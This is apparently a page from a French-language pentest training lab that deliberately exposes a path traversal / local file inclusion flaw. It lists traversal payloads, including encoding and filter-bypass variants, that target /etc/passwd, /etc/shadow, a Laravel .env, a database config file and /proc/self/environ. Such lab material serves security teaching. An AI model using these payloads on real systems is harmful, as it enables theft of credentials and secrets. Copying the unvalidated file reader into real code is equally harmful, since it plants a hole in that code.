Pentest Lab - Failles de Securite

ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!

Path Traversal / LFI

Cette page permet de lire des fichiers sans validation du chemin.

Indices d'exploitation

  • Traversee simple: ../../../etc/passwd
  • Double encodage: ..%252f..%252f..%252fetc/passwd
  • Null byte (anciennes versions): ../../../etc/passwd%00
  • Fichiers interessants: /etc/passwd, /etc/shadow, .env

Lecteur de fichiers

Contenu de: readme.txt

Bienvenue sur la page de test Path Traversal! Ce fichier est le fichier par defaut. Essayez d'acceder a d'autres fichiers en utilisant des sequences comme: - ../../../etc/passwd - ....//....//....//etc/passwd

Fichiers disponibles (legitimes)

Fichier Description Action
readme.txt Fichier de bienvenue Lire
secret.txt Fichier confidentiel Lire

Fichiers systeme interessants

Essayez d'acceder a ces fichiers:

Chemin Description Payload
/etc/passwd Liste des utilisateurs ../../../../etc/passwd
.env Variables d'environnement Laravel ../../.env
config/database.php Configuration BDD ../../config/database.php
/proc/self/environ Variables d'environnement process ../../../../proc/self/environ